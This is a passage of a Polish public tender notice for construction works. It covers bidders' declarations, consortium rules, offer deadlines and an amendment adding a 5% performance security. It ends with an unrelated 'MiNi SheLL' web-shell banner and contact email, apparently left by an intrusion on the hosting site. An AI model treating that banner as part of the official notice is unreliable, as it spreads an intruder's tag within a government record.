stanowiącego załącznik nr 2 do SWZ;<br/>1.2. Pełnomocnictwo – jeżeli dotyczy – do reprezentowania wykonawcy w postępowaniu albo do<br/>reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca<br/>wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do<br/>jego reprezentacji we właściwym rejestrze lub Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej.<br/>1.3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej) – jeżeli dotyczy, pełnomocnictwo do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego, zgodnie z art. 58 ust. 2 ustawy PZP.<br/>2. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu, zobowiązany jest złożyć wraz z ofertą:<br/>2.1. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP o niepodleganiu wykluczeniu z<br/>postępowania oraz spełnianiu warunków udziału w postępowaniu, na dzień składania ofert,<br/>według wzoru stanowiącego załącznik nr 3 do SWZ;<br/>2.2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej) - jeżeli dotyczy - oświadczenie o niepodleganiu<br/>wykluczeniu oraz oświadczenie o spełnianiu warunków udziału w postępowaniu, składa każdy z<br/>wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te winny potwierdzać brak<br/>podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu ( zgodnie z art.<br/>125 ust. 4 ustawy PZP ), według wzoru stanowiącego załącznik nr 3 do SWZ;<br/>2.3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej) – jeżeli dotyczy - Oświadczenie, o którym mowa w art.<br/>117 ust. 4 ustawy PZP, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy, według wzoru stanowiącego załącznik nr 5 do SWZ;<br/>2.4. W przypadku polegania przez wykonawcę na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby na podstawie w art. 118 ust. 1 ustawy PZP – jeżeli dotyczy:<br/>a) Oświadczenie o niepodleganiu wykluczeniu oraz Oświadczenie o spełnianiu warunków<br/>udziału w postępowaniu, w zakresie jakim wykonawca powołuje się na jego zasoby (zgodnie z<br/>art. 125 ust. 5 ustawy PZP), według wzoru stanowiącego załącznik nr 4 do SWZ;<br/>b) Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia (zaleca się skorzystanie z wzoru<br/>stanowiącego załącznik nr 9 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający,<br/>że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia:<br/>1. W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców lub<br/>powoływania się na zasoby podmiotów trzecich w celu wykazania spełniania warunków udziału<br/>w postępowaniu, wymaga się, by warunek określony w pkt 5.4 ogłoszenia dotyczący wiedzy i<br/>doświadczenia w realizacji robót budowlanych spełniał samodzielnie co najmniej jeden z tych<br/>wykonawców lub tych podmiotów.<br/>2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. członkowie konsorcjum,<br/>wspólnicy spółki cywilnej). W takim przypadku wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy<br/>PZP. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego.<br/>4. W przypadku, o którym mowa w pkt 1, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy (wzór oświadczenia stanowi Zał. nr 5 do<br/>SWZ).<br/>5. Sposób złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia został opisany w sekcji 5.6.) i 5.11.) niniejszego ogłoszenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zostały określone w załączniku nr 1 do SWZ.<br/>2. Zmiany umowy oraz warunki ich wprowadzenia zostały przewidziane w §15 Projektowanych<br/>postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-02 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zmianie ulega treść w ROZDZIAŁ XVII - WYMAGANIA DOTYCZĄCE ZABEZPIECZENIA NALEŻYTEGO WYKONANIA UMOWY. <br/>Było:<br/>Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.<br/>Jest:<br/>1.	Wykonawca wnosi na zasadach określonych w przepisach ustawy Prawo zamówień publicznych zabezpieczenie należytego wykonania umowy w wysokości 5 % <br/>ceny całkowitej podanej w ofercie. <br/>2. Strony postanawiają, że część zabezpieczenia w wysokości 70% kwoty określonej w ust. 1 niniejszego paragrafu, zostanie zwolniona w terminie 30 dni od dnia wykonania przedmiotu umowy i uznania (wg zasad określonych w § 11) przez Zamawiającego przedmiotu umowy za należycie wykonany. Kwota pozostawiona na zabezpieczenie roszczeń z tytułu rękojmi za wady zostanie zwolniona nie później niż w 15 dniu po upływie okresu rękojmi za wady. <br/>3. Termin ważności zabezpieczenia wniesionego dla pokrycia roszczeń z tytułu niewykonania lub nienależytego wykonania Umowy w formie niepieniężnej nie może upłynąć wcześniej, niż z upływem 30 dni od przekazania przez Wykonawcę robót i przyjęcia ich przez Zamawiającego jako należycie wykonanych. <br/>4. Termin ważności zabezpieczenia wniesionego dla pokrycia roszczeń z tytułu rękojmi za wady w formie niepieniężnej nie może upłynąć wcześniej, niż z upływem 15 dni od zakończenia najdłuższego okresu rękojmi. <br/>5. W przypadku, gdyby termin ważności zabezpieczenia miał upłynąć wcześniej, niż w terminach wskazanych w ust. 3 i 4, Wykonawca obowiązany jest odpowiednio przesunąć termin ważności zabezpieczenia, a potwierdzający to dokument doręczyć Zamawiającemu co najmniej 10 dni przed upływem ważności zabezpieczenia. <br/>6. Jeżeli Wykonawca w terminie określonym w ust. 5 nie doręczy Zamawiającemu dokumentu potwierdzającego przesunięcie terminu ważności zabezpieczenia, Zamawiający, w związku z nienależytym wykonaniem umowy przez Wykonawcę, będzie uprawniony do zmiany formy zabezpieczenia na zabezpieczenie w pieniądzu poprzez wypłatę całej kwoty, na jaką w dacie wystąpienia Zamawiającego opiewać będzie dotychczasowe zabezpieczenie. <br/>7. Jeżeli Wykonawca nie usunie w ustalonym terminie wad stwierdzonych w okresie objętym rękojmią, Zamawiający zleci ich wykonanie innemu Podmiotowi na koszt i ryzyko Wykonawcy. Wykonawca zobowiązany jest zwrócić Zamawiającemu koszty zastępczego usunięcia wad. Zamawiający wezwie <br/>Wykonawcę do zwrotu tych kosztów. Jeżeli Wykonawca nie zwróci Zamawiającemu kosztów zastępczego usunięcia wad w wyznaczonym terminie, koszty te zostaną pokryte z części zabezpieczenia należytego wykonania umowy pozostawionej na zabezpieczenie roszczeń z tytułu rękojmi za wady. W przypadku, gdyby kwota zabezpieczenia nie zaspokajała całości roszczenia Zamawiającego, Wykonawca zapłaci <br/>Zamawiającemu koszty zastępczego usunięcia wad w niepokrytej części w terminie 7 dni od dnia wezwania go do zapłaty.<br/>Jednocześnie zapisy te zostają wprowadzone do załącznika nr 1 do SWZ &#34;Istotne Postanowienia umowy&#34; w § 10.<br/>Ponadto zmianie ulega termin składania ofert, termin otwarcia ofert, termin związania ofertą zgodnie z treścią ogłoszenia.

Creat By MiNi SheLL
Email: jattceo@gmail.com